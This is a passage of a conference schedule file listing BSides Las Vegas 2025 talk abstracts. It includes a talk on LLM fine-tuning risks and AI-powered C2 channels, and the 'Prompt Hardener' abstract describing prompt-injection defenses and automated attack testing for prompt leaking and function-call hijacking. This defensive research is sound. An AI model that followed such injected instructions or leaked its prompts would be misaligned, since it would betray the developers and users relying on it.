This talk provides an in-depth look at the risks associated with LLM fine-tuning and its implications for security. Through a pre-recorded demonstration, we will illustrate how attackers can use AI-powered C2 channels in real-world scenarios. As AI continues to evolve, understanding and securing its hidden attack surfaces is critical—before adversaries fully &quot;tune in&quot; to these emerging opportunities.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-20m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/D8QXVT/</url>
            <location>Florentine F</location>
            
            <attendee>Noa Dekel</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>L7GJCM@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-L7GJCM</pentabarf:event-slug>
            <pentabarf:title>Risk it for the Biscuit: Crunching the Numbers on Cyber Threats</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T173000</dtstart>
            <dtend>20250804T175000</dtend>
            <duration>002000</duration>
            <summary>Risk it for the Biscuit: Crunching the Numbers on Cyber Threats</summary>
            <description>In this talk I discuss how little the latest zero day or the biggest CVSS’ are exploited, highlighting the largest cybersecurity incidents of the past year which are often rooted in simple misconfigurations, lack of MFA, or other supposedly minor uninteresting issues.

Focus on how to build a quick threat model of a company, how attacks originate, pivot, and affect companies. Highlighting how attackers typically have a goal rather than just wanting to exploit a specific weakness: extortion (ransomware), data exfiltration, defacement, etc.

I build on that by demonstrating how to take a new CVSS and threat model its applicability to your organization based on your larger scale threat model. For example, do you use this vulnerable software but there are already protections in place? If so, you might want to prioritize updating this software below your rollout of MFA, or a minor vulnerability that doesn’t have protections in place.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-20m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/L7GJCM/</url>
            <location>Florentine F</location>
            
            <attendee>Sean &quot;4dw@r3&quot; Juroviesky</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>FC7TDL@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-FC7TDL</pentabarf:event-slug>
            <pentabarf:title>From interview questions to cluster damage: Adventures in k8s cluster shenanigans</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T180000</dtstart>
            <dtend>20250804T184500</dtend>
            <duration>004500</duration>
            <summary>From interview questions to cluster damage: Adventures in k8s cluster shenanigans</summary>
            <description>From Interview Questions to Cluster Damage: Adventures in k8s Cluster Hacking
It all started with a simple task - creating technical interview questions for Kubernetes researchers. You know the type: &quot;What happens if this pod can&#x27;t schedule?&quot; or &quot;How would you debug a failing service?&quot; But as we brainstormed scenarios, we kept having these &quot;hold up, what if...&quot; moments that led us down some interesting paths.
We started testing our theories in lab environments, and what we found was both interesting and kind of amusing. Turns out there are quite a few ways to mess with a Kubernetes cluster that don&#x27;t require sophisticated zero-day exploits - just creative use of normal cluster operations.
In this talk, we&#x27;ll share three main insights from our accidental research project. First, we&#x27;ll look at some surprisingly effective ways to disrupt cluster operations through resource manipulation and component misconfigurations. These aren&#x27;t complex attacks - they&#x27;re the kind of things that could happen by accident if you&#x27;re not paying attention.
We&#x27;ll then explore how attackers might map out a cluster starting with limited access. Understanding this helps both with security testing and knowing what to watch out for in your monitoring. Finally, we&#x27;ll tackle a classic interview question that turned out to be more interesting than we expected: if someone compromises a node, can they take over the whole cluster?
This isn&#x27;t going to be a standard lecture - we want to hear your thoughts and experiences too. We&#x27;ll show some live demos and turn key points into discussions. After all, the best security insights often come from comparing notes with other practitioners.
The talk is aimed at folks who work with Kubernetes regularly - security engineers, DevSecOps teams, platform engineers. You don&#x27;t need to be a security expert, but you should be familiar with basic Kubernetes concepts. We&#x27;ll focus on practical stuff you can actually use, not theoretical edge cases.
By the end, you&#x27;ll have:
* Some new perspectives on cluster security
* Practical ideas for hardening your environments
* Better understanding of what to monitor
* Some good material for your own interview questions</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/FC7TDL/</url>
            <location>Florentine F</location>
            
            <attendee>Travis Lowe</attendee>
            
            <attendee>Amit Serper</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>WBYUUP@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-WBYUUP</pentabarf:event-slug>
            <pentabarf:title>Detect and Respond? Cool Story — or Just Don’t Let the Bad Stuff Start.</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T100000</dtstart>
            <dtend>20250804T102500</dtend>
            <duration>002500</duration>
            <summary>Detect and Respond? Cool Story — or Just Don’t Let the Bad Stuff Start.</summary>
            <description>Many teams still treat Kubernetes security like a post-deployment problem: detection tools, dashboards, and alert fatigue. But the most common threats — containers running as root, unrestricted installs, exposed host paths — start earlier, in the pod spec. By the time you&#x27;re reacting, it&#x27;s already too late.

This talk presents a hands-on alternative. Using a controlled Kubernetes environment, we’ll demonstrate how Kyverno and KubeArmor — two well-supported open source tools — can block insecure workloads before they run and prevent malicious behavior during runtime. Kyverno enforces policy at admission, stopping bad configurations before they reach the cluster. KubeArmor applies system-level controls after the container starts, closing Time-of-Check to Time-of-Use (TOCTOU) gaps that traditional tools miss. Together, they prevent the kinds of activity that detection tools only alert on — after exploitation has already begun.

These aren’t abstract controls. They work today, in real clusters, with policies defined in human-readable YAML and managed in Git — no rewrites, no platform overhaul.

**This talk covers:**
- Why “detection as protection” doesn’t hold up  
- What runtime security really looks like in Kubernetes  
- How public containers and default chart configs quietly open the door  
- How Kyverno and KubeArmor make actual enforcement simple and scalable  

This talk assumes light Kubernetes familiarity and is designed to equip, not overwhelm. Kyverno and KubeArmor aren’t the full solution, but they fill the enforcement gap that often gets ignored.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Proving Ground Talk-25m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/WBYUUP/</url>
            <location>Firenze</location>
            
            <attendee>Jimmy Shah</attendee>
            
            <attendee>Matthew Brown</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>BANTPJ@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-BANTPJ</pentabarf:event-slug>
            <pentabarf:title>I Didn’t Register for This: What’s Really in Google’s Artifact Registry?</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T103000</dtstart>
            <dtend>20250804T105500</dtend>
            <duration>002500</duration>
            <summary>I Didn’t Register for This: What’s Really in Google’s Artifact Registry?</summary>
            <description>The Artifact Registry is the go-to solution for hosting container images in GCP. It is widely adopted by customers for storing and managing images, but Google itself uses it for hosting and managing many container images as well. The images managed by Google can be split into three categories: Public Images offered by Google for its users&#x27; convenience, images by third-party companies vetted and uploaded by Google to the cloud marketplace, and Google production images used in actual GCP services. All three categories carry significant trust from Google to its users, raising the question - how secure are they, really? To find out, we decided to dive into some research and test any images we could find across these categories.

Some of these Google-managed images are not documented or meant for public use, despite having read permissions for all GCP users - making their discovery complex. We were able to utilize and develop several techniques for discovering and scanning these images for security issues, which enabled us to find and scan thousands of images. Google claims in its documentation that it vets and checks the container images for vulnerabilities, but the results show otherwise. Many actively maintained images across all three categories contained outdated software with critical vulnerabilities, including some of the most infamous and exploited in the wild. In addition to the vulnerabilities, we discovered plain-text secrets and credentials to key services, cloud providers, and APIs.

In this talk, we will explore some of the questions these issues raise while walking the audience through our process of revealing and analyzing the images: What is the severity of the issues we found, and what is the actual risk they pose to GCP users? Is it Google&#x27;s responsibility to ensure the safety of the products in its marketplace? We will conclude by equipping GCP users with best practices to protect themselves and mitigate these issues in their environment.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Proving Ground Talk-25m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/BANTPJ/</url>
            <location>Firenze</location>
            
            <attendee>Lenin Alevski</attendee>
            
            <attendee>Moshe Bernstein</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>DWYE8M@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-DWYE8M</pentabarf:event-slug>
            <pentabarf:title>SOC Like a Genius: Cognitive Agents Delivering Wisdom at Scale</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T110000</dtstart>
            <dtend>20250804T112500</dtend>
            <duration>002500</duration>
            <summary>SOC Like a Genius: Cognitive Agents Delivering Wisdom at Scale</summary>
            <description>We introduce an agent-based detection framework that uses top-down reasoning and contextual understanding - powered by SLM/LLMs - to go beyond static correlation and entity matching. Each AI agent is designed for a specific role in the detection lifecycle, forming a modular pipeline that improves accuracy, prioritization, and automation. This is a new approach in applying cognitive AI to SOC workflows and brings reasoning, intent analysis, and wisdom-driven decisions to detection and response. It solves alert fatigue, missed and false correlations, schema dependency, and the inefficiencies of static rules. Traditional correlation engines can&#x27;t scale across multi-domain, multi-vendor, cross-entity threats or adapt fast enough. This framework gives SOCs the ability to reason about alerts, hypothesize links, and prioritize actions - reducing noise, improving detection coverage, and enabling faster responses.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Proving Ground Talk-25m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/DWYE8M/</url>
            <location>Firenze</location>
            
            <attendee>Sarah Young</attendee>
            
            <attendee>Oudy Even Haim</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>7ZBBAZ@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-7ZBBAZ</pentabarf:event-slug>
            <pentabarf:title>Innovative, Shiny, and Vulnerable: Four Ways to Exploit Modern SaaS Data Platforms</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T140000</dtstart>
            <dtend>20250804T142500</dtend>
            <duration>002500</duration>
            <summary>Innovative, Shiny, and Vulnerable: Four Ways to Exploit Modern SaaS Data Platforms</summary>
            <description>This talk will discuss four common vulnerabilities in some of the products I have tested that can fit the &quot;SaaS data platform&quot; description. I identified these vulnerabilities in various data analytics, AI data/feature engineering, and customer data platforms as part of penetration tests performed on behalf of my employer, Praetorian (https://praetorian.com). The names of these products will be abstracted to protect their reputation. An overview of the four issues I will discuss is as follows:

1) Control-Plane Access Control Gaps: This category refers to access control vulnerabilities in the product&#x27;s web UI, API, SDK, or any other interface that customers can use to view or modify their account and configuration. Standard vulnerabilities like Insecure Direct Object Reference (IDOR), insufficient authorization, and overly permissive user roles in the application&#x27;s RBAC model can lead to unauthorized disclosure of data within an organization&#x27;s tenant or across customers. Additionally, some platforms provide free demo accounts that users can self-sign up for without restricting or isolating them, exposing the product and all their customers&#x27; data to a broader attack surface.

2) Remote Code Execution as a Service (RCEaaS): Many of these platforms provide custom logic and algorithm execution as part of their Extract, Transform, and Load (ETL) capabilities. While they take steps to lock down this functionality, the protections can often be bypassed since the code execution usually uses high-level languages like JavaScript and Python, and accounting for every sandbox escape is nearly impossible. After an attacker exploits these features, they can access the platform&#x27;s data plane and move laterally within that environment, leading to the third issue.

3) Data-Plane Access Control Gaps: Start-ups and other lean companies usually build these platforms in public cloud infrastructure since it is more cost-effective. Most of the platforms I tested had issues with their deployment architecture. One of these would be over-privileged principals, like the compute instances running customer jobs. An attacker who gains access to the cloud infrastructure by exploiting the code execution features could retrieve the credentials provided to the compute layer and access other resources like storage or secrets. Log files containing sensitive data like access tokens or API keys were often written to the instance file system or cloud storage. An attacker could use the secrets to perform horizontal privilege escalation to other customer tenants or vertical privilege escalation within the tenant. Cross-tenant data leakage is a concern if the data planes between customers are not sufficiently isolated, such as by using distinct cloud accounts.

4) Highly Scalable Architecture: Many data platforms use serverless technology like AWS Lambda to process data and implement user-defined logic. This infrastructure can quickly scale to millions of requests. If the platform does not enforce strict rate-limiting or logic checks on an experimental user or malicious actor, the number of jobs may spiral out of control. The platform&#x27;s cloud bill could skyrocket, and if the customer eats the cost, that business could be lost and the platform&#x27;s reputation damaged due to accidental resource over-consumption. Even more interesting than a fat bill is the potential for weaponizing the platform&#x27;s traffic generation into denial-of-service attacks on arbitrary targets, as I demonstrated in a Praetorian blog post called &quot;Recursive Amplification Attacks: Botnet-as-a-Service,&quot; seen here: https://www.praetorian.com/blog/recursive-amplification-attacks-botnet-as-a-service/

There will not be any live demos during the presentation due to the amount of content to be discussed in the time allotted. However, every technical concept, vulnerability, or hacking technique will be explained with a simple and concise visual example.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Proving Ground Talk-25m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/7ZBBAZ/</url>
            <location>Firenze</location>
            
            <attendee>Ben Kofman</attendee>
            
            <attendee>Ali Kabeel</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>BHMKYS@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-BHMKYS</pentabarf:event-slug>
            <pentabarf:title>Prompt Hardener - Automatically Evaluating and Securing LLM System Prompts</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T150000</dtstart>
            <dtend>20250804T152500</dtend>
            <duration>002500</duration>
            <summary>Prompt Hardener - Automatically Evaluating and Securing LLM System Prompts</summary>
            <description>As LLMs become foundational components of modern applications, prompt security has emerged as a critical concern. Developers often rely on handcrafted system prompts without testing how they behave under adversarial conditions. While multiple techniques exist to harden prompts as part of a layered defense strategy, there is no unified way to apply and evaluate them systematically. 

**Prompt Hardener** addresses this by automating both **refinement** and **validation** of system prompts. Using the LLM itself, it performs structured evaluations based on predefined criteria and applies improvements using layered security strategies:

- **Spotlighting**: Explicitly marks and isolates all user-controlled input using tags and special characters to prevent injection
- **Random Sequence Enclosure**: Encloses trusted system instructions in unpredictable tags, ensuring only those are followed and not leaked
- **Instruction Defense**: Instructs the model to ignore new instructions, persona switching, or attempts to reveal/modify system prompts
- **Role Consistency**: Ensures each message role (system, user, assistant) is preserved and not mixed, preventing role confusion attacks

You can check the details of each hardening technique [here](https://github.com/cybozu/prompt-hardener/blob/main/docs/techniques.md).

After hardening, the tool performs **automated injection testing** with a corpus of categorized payloads that simulate common attack scenarios. These include prompt leaking, improper output handling, tool enumeration, and function call hijacking. These are basically based on [OWASP Top 10 for LLM Applications 2025](https://genai.owasp.org/resource/owasp-top-10-for-llm-applications-2025/) but also include other modern attacks. The results are summarized in JSON and visualized in HTML reports, making it easy for LLM application developers and security engineers to measure resilience.

You can check examples of using Prompt Hardener to improve and test various system prompts [here](https://github.com/cybozu/prompt-hardener/blob/main/docs/tutorials.md).

A simple Gradio UI allows non-CLI users to access the full pipeline: input prompts, evaluate and harden them, and run attack simulations with just a few keystrokes and clicks.

By the end of this talk, attendees will understand how to:

- Identify prompt weaknesses before deployment
- Apply defense-in-depth techniques to prompts
- Validate the effectiveness of defenses with attack simulations
- Integrate prompt security testing into their CI pipelines or red team workflows

GitHub URL: https://github.com/cybozu/prompt-hardener</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Proving Ground Talk-25m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/BHMKYS/</url>
            <location>Firenze</location>
            
            <attendee>Krity Kharbanda</attendee>
            
            <attendee>Junki Yuasa</attendee>
            
            <attendee>Yoshiki Kitamura</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>BAHK8E@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-BAHK8E</pentabarf:event-slug>
            <pentabarf:title>Community Defense in Depth: Teaching digital security and privacy practices for the public good</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T153000</dtstart>
            <dtend>20250804T155500</dtend>
            <duration>002500</duration>
            <summary>Community Defense in Depth: Teaching digital security and privacy practices for the public good</summary>
            <description>I&#x27;ve developed this talk over the past year, based on my experiences volunteering as a digital security trainer to activists, journalists and other people involved in the human rights space. The audience will learn how to educate the public in a world where privacy laws can change overnight.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Proving Ground Talk-25m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/BAHK8E/</url>
            <location>Firenze</location>
            
            <attendee>Lidia Giuliano</attendee>
            
            <attendee>Melanie Gonzalez</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>8XRRGH@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-8XRRGH</pentabarf:event-slug>
            <pentabarf:title>Azazel System: Tactical Delaying Action via the Cyber-Scapegoat Gateway</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T170000</dtstart>
            <dtend>20250804T172500</dtend>
            <duration>002500</duration>
            <summary>Azazel System: Tactical Delaying Action via the Cyber-Scapegoat Gateway</summary>
            <description>### **1. Introduction**  
Modern cybersecurity defense must move beyond passive monitoring and immediate attack blocking. Attackers are increasingly using automated tools that quickly scan, exploit, and establish persistence within seconds. **Traditional honeypots collect attack data but do not interfere with or slow down adversaries. Decoy servers mislead attackers but do not impact their decision-making time.**  

This presentation introduces **Azazel System**, a **portable, low-cost cyber deception gateway that incorporates tactical delaying actions** to provide an effective response against real-world cyber threats. **By leveraging the concept of cyber-scapegoating, the system not only misdirects attackers but actively slows them down using real-time intervention techniques.**  

Built on **Raspberry Pi 5 (8GB) with a hybrid architecture**, Azazel System employs:  
- **Real-time traffic manipulation** using `tc` (Traffic Control) and `iptables`  
- **Cyber-scapegoat deception** to absorb and delay attacks rather than just observing them  
- **Automated logging and threat classification** using Fluent Bit and MITRE ATT&amp;CK  
- **Integration with public Wi-Fi and untrusted network environments**, ensuring adaptability for diverse deployment scenarios  

This talk will explore the **design, deployment, and defensive applications** of this **portable security gateway**, demonstrating its **effectiveness in delaying attacks while providing defenders with essential response time**.

---

### **2. Tactical Delaying Action in Cybersecurity**  
#### **2.1. Military Delaying Action: A Defensive Strategy**  
In military land warfare, **delaying actions** are used to **slow enemy forces, disrupt their movements, and create opportunities for counterattacks**. These tactics include:  
- **Strategic withdrawal while applying resistance** to force attackers into resource exhaustion  
- **Obstacle deployment to manipulate enemy pathways**  
- **Diversionary targets to redirect enemy focus**  

Azazel System applies these principles to cybersecurity by **deliberately controlling an attacker&#x27;s progress, rather than merely blocking access**.

---

### **3. The Cyber-Scapegoat Model: Beyond Traditional Honeypots**  
**Problem:** Previous deception techniques fail to **actively interfere with an attacker’s workflow**.  
**Solution:** Cyber-scapegoats **absorb attacks and delay adversaries, increasing their operational fatigue**.  

| **Method** | **Honeypots** | **Decoy Servers** | **Cyber-Scapegoat (Azazel System)** |
|-----------|--------------|------------------|----------------------------|
| **Purpose** | Collect attack data | Misdirect attackers | **Actively delay and disrupt attacks** |
| **Impact on Attackers** | No direct interaction | Passive deception | **Manipulates and slows adversaries** |
| **Operational Outcome** | Intelligence gathering | Temporary misdirection | **Fatigue attackers and buy defender response time** |

Unlike traditional deception models, Azazel System **exploits attacker persistence by prolonging their engagement with non-critical assets**.

---

### **4. Hybrid Architecture and Deployment**  
📌 **Challenge:** Running **active deception and tactical delay mechanisms** on resource-limited hardware.  
📌 **Solution:** A **hybrid system** that offloads deep attack analysis to an external laptop.  

#### **4.1. System Overview**  
📌 **Azazel System operates as a portable gateway, intercepting and delaying attacks before they reach critical assets.**  

🔹 **Key Components:**  
- **Raspberry Pi 5 (8GB) as the core gateway**  
- **Containerized OpenCanary for deception**  
- **Real-time network manipulation with `tc` and `iptables`**  
- **Automated log forwarding via Fluent Bit**  
- **External laptop for in-depth forensic analysis**  

🔹 **Deployment Use Cases:**  
- **Security for public Wi-Fi and travel networks**  
- **SOC (Security Operations Center) incident response augmentation**  
- **Cyberwarfare research and adversary behavior modeling**  

---

### **5. Implementation and Attack Mitigation Techniques**  
📌 **Azazel System actively intervenes in attack processes rather than just logging them.**  

#### **5.1. Network Delay &amp; Redirection**  
📌 **Key Mechanism:** Slow down reconnaissance and exploit attempts using dynamic network manipulation.  

🔹 **Methods Used:**  
- **`tc` to artificially increase latency in suspicious connections**  
- **`iptables` rules to reroute attackers into deception environments**  
- **Adaptive response, progressively increasing delays on persistent threats**  

#### **5.2. Logging, Threat Classification, and MITRE ATT&amp;CK Integration**  
📌 **Key Mechanism:** **Suricata intrusion alerts** processed via Fluent Bit and classified using MITRE ATT&amp;CK.  

🔹 **How It Works:**  
- **Suricata detects unusual network activity.**  
- **Fluent Bit sends logs to an external laptop.**  
- **Kibana visualizes the attack timeline, mapped to MITRE ATT&amp;CK.**  

---

### **6. Key Benefits and Tactical Advantages**  
📌 **Azazel System offers advantages beyond traditional deception techniques:**  

🔹 **Delaying attackers to increase defensive response time**  
🔹 **Cyber-scapegoat model actively manipulates adversary behavior**  
🔹 **Lightweight, portable deployment suitable for high-risk environments**  
🔹 **OSS-based, making it cost-effective and adaptable**</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Proving Ground Talk-25m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/8XRRGH/</url>
            <location>Firenze</location>
            
            <attendee>Soya Aoyama</attendee>
            
            <attendee>Makoto Sugita</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>8QHF9R@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-8QHF9R</pentabarf:event-slug>
            <pentabarf:title>The Perfect BLEnd: Reverse engineering a bluetooth controlled blender for better smoothies</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T173000</dtstart>
            <dtend>20250804T175500</dtend>
            <duration>002500</duration>
            <summary>The Perfect BLEnd: Reverse engineering a bluetooth controlled blender for better smoothies</summary>
            <description>This is a hobby project (not work related) where I&#x27;ve been poking at a Nutribullet Smart Balance blender on and off for several years. Late last summer I finally got around to pulling together the notes I had on the different parts of the BLE (bluetooth low energy) protocol for controlling the blender and put the pieces together to create an open source web app using WebBluetooth for controlling the blender. Using a variety of tools (listed below), I&#x27;ll go through the process I followed in learning to sniff bluetooth communications and how bluetooth low energy works. This will include my initial attempts using an nRF52 devkit prior to leveraging bluetooth logging features included in smartphones (and laptops). If there is time, a brief peek at decompiling the Android app revealed blenders and smart scales from other companies that might share the same protocol and could be future devices to look at.

Tools:
* nRF52 DevKit
* Wireshark
* Variety of free BLE scanner apps
* PacketLogger (free tool included with Xcode utilities)
* libimobiledevice idevicebtlogger (open source alternative to PacketLogger)
* https://github.com/nightlark/nutribullet (WebBluetooth app developed based on findings)</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Proving Ground Talk-25m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/8QHF9R/</url>
            <location>Firenze</location>
            
            <attendee>Edward Farrell</attendee>
            
            <attendee>Ryan Mast</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>LDTD3E@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-LDTD3E</pentabarf:event-slug>
            <pentabarf:title>RAGnarok: Assisting Your Threat Hunting with Local LLM</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T180000</dtstart>
            <dtend>20250804T182500</dtend>
            <duration>002500</duration>
            <summary>RAGnarok: Assisting Your Threat Hunting with Local LLM</summary>
            <description>RAGnarok is an assisting tool for the threat hunting process with a local Large Language Model (LLM). It can generate a Sigma rule automatically for a specific attack technique based on threat intelligence like MITRE ATT&amp;CK.
In this talk, I will explain the architecture of RAGnarok, then elaborate on the technologies implemented. Also, I will provide a pre-recorded demo for a better understanding of RAGnarok. And finally, some know-how and tips obtained from developing RAGnarok will be covered.

This talk has been developed based on my experience. When I was involved in threat hunting, there were many different procedures and approaches for it, and I felt it was too much for beginners. On the other hand, threat hunting also has many monotonous operations, and it can easily become boring.
My motivation for developing RAGnarok is to automate the threat hunting process with a local LLM, especially boring processes, and concentrate on only interesting processes. In other words, humans will focus on only the advanced steps in the threat hunting process. Additionally, assisting beginners by generating practical results (Sigma rules) is also my motivation.
Threat hunting usually requires environment information such as server configuration or account information. In this talk, Windows Active Directory configuration is especially focused on as environmental information, and collected and manipulated by using &quot;Bloodhound&quot;. These types of environmental information are often regarded as confidential information, so RAGnarok adopts a local LLM instead of a cloud-based LLM in order to avoid uploading the information to the Internet.
The base technologies of RAGnarok are &quot;Quantized LLM&quot;, &quot;Retrieval-Augmented Generation (RAG)&quot;, and &quot;Multi-Agent System&quot;. Combining them enables RAGnarok to generate highly professional and accurate results without fine-tuning on a CPU-only machine.
However, there are a lot of misunderstandings in using these LLM-related technologies because of their complexity. Therefore, this talk will provide not only the technical details of RAGnarok, but also the key points of utilizing LLMs, especially local LLMs, as know-how or tips.
Furthermore, one of the concepts behind RAGnarok is scalability. Of course, we can easily add a new feature to RAGnarok. But it also means that the architecture of RAGnarok is applicable to other areas of cybersecurity, such as red teaming. In other words, threat hunting is just one of the use cases of the proposed architecture. I believe that this talk can contribute to promoting the use of a local LLM in the whole cybersecurity field.

RAGnarok is going to be available as open source by the time of the talk.

Tools:
- Docker: https://www.docker.com/
- Bloodhound-CE: https://github.com/SpecterOps/BloodHound
- Langgraph: https://www.langchain.com/langgraph
- Ollama: https://ollama.com/

The following presentation is the prototype of RAGnarok.
Of course, as RAGnarok has evolved from the prototype, they are not the same.
For example, there are some differences in architecture and function related to treating environmental information. (I will elaborate on them in the talk.)
But this presentation will help you imagine what RAGnarok is all about!
- Presentation record: https://www.youtube.com/watch?v=a0FvmNkpVLI&amp;list=PLALq3Th79NnpPtZ28R-WPbepAPwgYHYiz&amp;index=5&amp;pp=iAQB
- Presentation material: https://ctid.mitre.org/events/apac-2025/08%20-%20MITRE%20ATT&amp;CK%20Driven%20Threat%20Hunting%20Automated%20by%20Local%20LLM.pdf</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Proving Ground Talk-25m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/LDTD3E/</url>
            <location>Firenze</location>
            
            <attendee>Cybelle Oliveira</attendee>
            
            <attendee>Jun Miura</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>JWXSRB@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-JWXSRB</pentabarf:event-slug>
            <pentabarf:title>SIGMA, one rule to find them all</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T183000</dtstart>
            <dtend>20250804T185500</dtend>
            <duration>002500</duration>
            <summary>SIGMA, one rule to find them all</summary>
            <description>&quot;The Gremlin Hunter&quot; project was developed as a way to solve the challenges I had of searching in a consistent way, that could be tracked and then action that information to produce actionable intelligence. Together with my team, I developed a process modeled on a &quot;guided&quot; hunt framework, following the Intelligence Lifecycle. The hunts are developed using OSINT and internal research from our CTI team, which I put into the SIGMA rule format. I then input these into our MISP instance, where we use pySIGMA to process and translate the rules. The rules are then sent over to our ticketing system where they are distributed weekly to the hunting team.
The hunt team takes the queries that are translated and tests them in the environments, running them to hunt for whatever evil it is they are looking for. Final queries that are deemed production worthy are submitted to our engineering team to deploy as permanent detections. 
The training will include showing our guided hunt workflow setup as well as demonstrating the process I used to create a SIGMA rule to hunt for a particular threat or activity, as well as some tips and hints on how to overcome some of the challenges when writing rules.
Avatar of Gremlin Hunter is art by Phil Cho https://www.philchoart.com/featured/2020/11/13/gizmo-gremlin-hunter-earth-27-commission</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Proving Ground Talk-25m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/JWXSRB/</url>
            <location>Firenze</location>
            
            <attendee>HD Moore</attendee>
            
            <attendee>Rain Baker</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>EKZ7ZD@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-EKZ7ZD</pentabarf:event-slug>
            <pentabarf:title>I&#x27;m A Machine, And You Should Trust Me: The Future Of Non-Human Identity</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
